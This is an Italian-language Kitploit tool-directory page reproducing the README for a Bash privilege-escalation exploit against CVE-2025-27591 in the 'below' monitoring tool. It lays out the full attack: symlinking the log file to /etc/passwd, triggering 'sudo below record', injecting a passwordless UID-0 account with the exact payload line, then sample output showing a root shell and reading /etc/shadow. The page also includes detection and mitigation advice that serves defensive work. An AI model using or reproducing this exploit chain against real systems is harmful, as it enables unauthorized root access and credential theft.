Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Below-Logger-Symlink-Attack_CVE-2025-27591 — Un exploit di escalation dei privilegi basato su Bash che prende di mira lo strumento di monitoraggio delle prestazioni di sistema `below`. Questo exploit rinnovato sfrutta una vulnerabilità di symlink nel meccanismo di logging per iniettare un utente root in `/etc/passwd`, ottenendo accesso completo come root. | Kitploit
Strumenti/GitHubGitHub/0xdtc/below-logger-symlink-attack_cve-2025-27591
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHub0xdtc/below-logger-symlink-attack_cve-2025-27591

Below-Logger-Symlink-Attack_CVE-2025-27591

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Un exploit di escalation dei privilegi basato su Bash che prende di mira lo strumento di monitoraggio delle prestazioni di sistema `below`. Questo exploit rinnovato sfrutta una vulnerabilità di symlink nel meccanismo di logging per iniettare un utente root in `/etc/passwd`, ottenendo accesso completo come root.

Vedi Repository
2110 mesi faNon ancora revisionato
Condividi

Buy me a knowledge

CVE-2025-27591 Exploit - Attacco Symlink del Logger Below

Un exploit di escalation dei privilegi basato su Bash che mira allo strumento di monitoraggio delle prestazioni di sistema below. Questo exploit rinnovato sfrutta una vulnerabilità symlink nel meccanismo di logging per iniettare un utente root in /etc/passwd, ottenendo accesso root completo.

Crediti

Scoperto e segnalato da Matthias Gerstner @ SUSE - Avviso di Sicurezza

Dettagli della Vulnerabilità

  • CVE: CVE-2025-27591
  • Componente Affetto: /usr/bin/below (monitoraggio prestazioni sistema Facebook)
  • Versioni Affette: versioni di below con directory di log scrivibili da tutti
  • Tipo di Vulnerabilità: Attacco Symlink / Escalation dei Privilegi
  • Vettore d'Attacco: /var/log/below/error_root.log → /etc/passwd
  • Punteggio CVSS: Alto (Escalation dei Privilegi a Root)

Panoramica

Lo strumento di monitoraggio below registra gli errori in /var/log/below/error_root.log quando eseguito con privilegi elevati. Se la directory di log è scrivibile da tutti, un attaccante può:

  1. Creare un collegamento simbolico da error_root.log a /etc/passwd
  2. Attivare il comando below record per scrivere messaggi di errore nel symlink
  3. Iniettare manualmente una voce utente malintenzionata con UID=0 (privilegi root)
  4. Avviare una shell root utilizzando il nuovo utente creato

Questo exploit automatizza l'intero processo con meccanismi di fallback intelligenti per gestire varie configurazioni di sistema.

Diagramma di Flusso dell'Exploit

root@kitploit:~
flowchart TD
    A[Start Exploit] --> B[Get Username from User]
    B --> C{Check /var/log/below<br/>World-Writable?}
    C -->|No| D[Exit: Not Vulnerable]
    C -->|Yes| E[Remove Existing error_root.log]
    E --> F[Create Symlink:<br/>error_root.log → /etc/passwd]
    F --> G{Symlink Created<br/>Successfully?}
    G -->|No| D
    G -->|Yes| H[Execute: sudo below record]
    H --> I[Wait 3 seconds for logging]
    I --> J[Kill below process]
    J --> K{Payload in<br/>/etc/passwd?}
    K -->|Yes| M[Success Path]
    K -->|No| L[Attempt Manual Injection:<br/>echo payload >> symlink]
    L --> N{Manual Injection<br/>Success?}
    N -->|No| O[Try Fallback:<br/>sudo tee -a]
    N -->|Yes| M
    O --> P{Fallback<br/>Success?}
    P -->|No| D
    P -->|Yes| M
    M --> Q[Verify Payload in /etc/passwd]
    Q --> R[Disable Cleanup Trap]
    R --> S[Execute: su username]
    S --> T[Root Shell Obtained]

    style A fill:#e1f5ff
    style T fill:#90EE90
    style D fill:#ffcccb
    style M fill:#98fb98

Dettagli Tecnici

Fasi dello Sfruttamento

  1. Fase di Pre-Controllo

    • Verificare che la directory /var/log/below esista
    • Controllare se la directory ha permessi scrivibili da tutti (o+w)
    • Testare la capacità di creazione di symlink
  2. Fase di Configurazione

    • Rimuovere il file error_root.log esistente
    • Creare il collegamento simbolico: /var/log/below/error_root.log → /etc/passwd
    • Verificare che il symlink punti al target corretto
  3. Fase di Iniezione (Metodo Primario)

    • Eseguire sudo below record in background
    • Lasciare il processo attivo per 3 secondi per attivare la registrazione degli errori
    • Terminare il processo per evitare la registrazione continua
    • Controllare se i messaggi di errore hanno corrotto /etc/passwd in modo utile
  4. Fase di Iniezione (Metodi di Fallback)

    • Metodo 1: Aggiunta diretta tramite symlink (echo >> symlink)
    • Metodo 2: Utilizzo di sudo con tee (sudo tee -a)
  5. Fase di Avvio della Shell

Struttura del Payload

La voce iniettata in /etc/passwd segue questo formato:

root@kitploit:~
username::0:0:username:/root:/bin/bash

Scomposizione dei Campi:

  • username: Nome utente fornito dall'utente (predefinito: "0xdtc")
  • ::: Campo password vuoto (nessuna password richiesta)
  • 0:0: UID=0, GID=0 (privilegi root)
  • username: Campo GECOS (descrizione utente)
  • /root: Home directory
  • /bin/bash: Shell di login

Prerequisiti

  • Sistema target che esegue il binario below vulnerabile
  • La directory /var/log/below deve essere scrivibile da tutti
  • L'utente deve avere accesso sudo per eseguire below record
  • Ambiente Bash shell

Utilizzo

Esecuzione Base

root@kitploit:~
# Rendi lo script eseguibile
chmod +x CVE-2025-27591

# Esegui l'exploit
./CVE-2025-27591

Prompt Interattivi

root@kitploit:~
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): myuser
[+] Using username: myuser

Esempio di Output

root@kitploit:~
0xdtc@kali:/tmp$ ./CVE-2025-27591
========================================
  CVE-2025-27591 Exploit (Bash)
========================================

[*] This exploit will create a new root user in /etc/passwd
[?] Enter username for the new root user (default: 0xdtc): 0xdtc
[+] Using username: 0xdtc

[*] Checking for CVE-2025-27591 vulnerability
[+] /var/log/below is world-writable
[*] Testing symlink creation
[+] Symlink test successful
[+] Target is vulnerable

[*] Starting exploitation
[+] Wrote payload to /tmp/exploit_payload
[*] Creating symlink: /var/log/below/error_root.log -> /etc/passwd
[+] Symlink created
[*] Executing 'sudo below record' to trigger logging
[*] Started 'below record' with PID: 12345
[*] Checking if payload was written
[*] Attempting manual injection
[*] Appending payload to /etc/passwd via symlink
[+] Payload appended
[+] Exploitation completed! Payload is in /etc/passwd
[*] Spawning root shell via 'su 0xdtc'
[*] Password should be empty, just press Enter

root@kali:/tmp# whoami
root

Caratteristiche

Gestione Intelligente dei Blocchi

Lo script include molteplici meccanismi di fallback per gestire varie configurazioni di sistema:

  1. Gestione File Esistenti

    • Rileva e rimuove automaticamente i file di log esistenti
    • Gestisce sia file regolari che symlink esistenti
    • Verifica il target del symlink prima di procedere
  2. Metodi di Iniezione Multipli

    • Primario: Attivazione tramite logging errori di below record
    • Fallback 1: Aggiunta diretta al symlink
    • Fallback 2: Scrittura privilegiata usando sudo tee
  3. Gestione dei Processi

    • Termina automaticamente i processi below in stallo
    • Previene l'esaurimento delle risorse
    • Gestisce la pulizia dei processi in caso di fallimento
  4. Rilevamento di Esecuzioni Ripetute

    • Controlla se il payload esiste già in /etc/passwd
    • Salta lo sfruttamento se l'utente è già stato creato
    • Avvia direttamente la shell in caso di riesecuzione

Caratteristiche di Qualità del Codice

  • Commenti Esaustivi: Ogni funzione e passaggio critico documentati
  • Intestazioni di Sezione: Codice organizzato in sezioni logiche
  • Gestione degli Errori: Controlli errori e feedback utente adeguati
  • Uscita Pulita: Gestori trap per pulizia ordinata in caso di fallimento
  • Dipendenze Minime: Bash puro con strumenti Unix standard

Struttura dei File

root@kitploit:~
.
├── CVE-2025-27591           # Script principale dell'exploit
├── README.md           # Questa documentazione
└── /tmp/exploit_payload # File payload temporaneo (creato in runtime)

Verifica

Dopo lo sfruttamento riuscito, verificare l'accesso root:

root@kitploit:~
# Controlla l'utente corrente
root@target:/tmp# whoami
root

# Controlla ID utente e gruppi
root@target:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

# Verifica l'utente in /etc/passwd
root@target:/tmp# grep "^0xdtc:" /etc/passwd
0xdtc::0:0:0xdtc:/root:/bin/bash

# Leggi file riservati a root
root@target:/tmp# cat /etc/shadow
[... shadow file contents ...]

Pulizia

Se è necessario rimuovere l'utente malintenzionato dopo il test:

root@kitploit:~
# Rimuovere l'utente iniettato da /etc/passwd
sudo sed -i '/^username:/d' /etc/passwd

# Rimuovere eventuali symlink rimasti
rm -f /var/log/below/error_root.log

Sostituire username con il nome utente effettivo utilizzato durante lo sfruttamento.

Rilevamento e Mitigazione

Metodi di Rilevamento

  1. Monitoraggio dell'Integrità dei File

    root@kitploit:~
    # Monitorare /etc/passwd per modifiche non autorizzate
    aide --check
    
  2. Rilevamento Symlink

    root@kitploit:~
    # Controllare la presenza di symlink sospetti nelle directory di log
    find /var/log -type l -ls
    
  3. Log di Audit

    root@kitploit:~
    # Controllare l'utilizzo sospetto di sudo
    grep "below record" /var/log/auth.log
    

Strategie di Mitigazione

  1. Correggere i Permessi delle Directory

    root@kitploit:~
    # Rimuovere il permesso di scrittura mondiale dalla directory di log
    sudo chmod 755 /var/log/below
    
  2. Politiche AppArmor/SELinux

    • Implementare controlli di accesso obbligatori
    • Limitare le posizioni di scrittura dei file del binario below
  3. Aggiornare Below

    • Applicare le patch di sicurezza di Facebook/Meta
    • Utilizzare gli aggiornamenti del gestore pacchetti
  4. Monitorare /etc/passwd

    • Configurare il monitoraggio dell'integrità dei file (AIDE, Tripwire)
    • Avvisare in caso di aggiunte di utenti con UID=0

Dichiarazione di Esclusione di Responsabilità Legale

Questo exploit è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati.

L'accesso non autorizzato ai sistemi informatici è illegale. Utilizzare questo strumento solo su sistemi per i quali si dispone di esplicita autorizzazione per eseguire test di sicurezza. Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo strumento.

Utilizzando questo exploit, riconosci di:

  • Avere l'autorizzazione appropriata per testare il sistema target
  • Comprendere le leggi e i regolamenti applicabili
  • Accettare la piena responsabilità per le tue azioni

Repository: https://github.com/0xDTC/ Autore: Divine Clown (0xDTC) Licenza: Solo per uso educativo Ultimo aggiornamento: 2025-11-13

Scarica lo strumento
  • Verificare che l'utente malintenzionato esista in /etc/passwd
  • Disabilitare i trap di pulizia per impedirne la rimozione
  • Eseguire su <username> per ottenere una shell root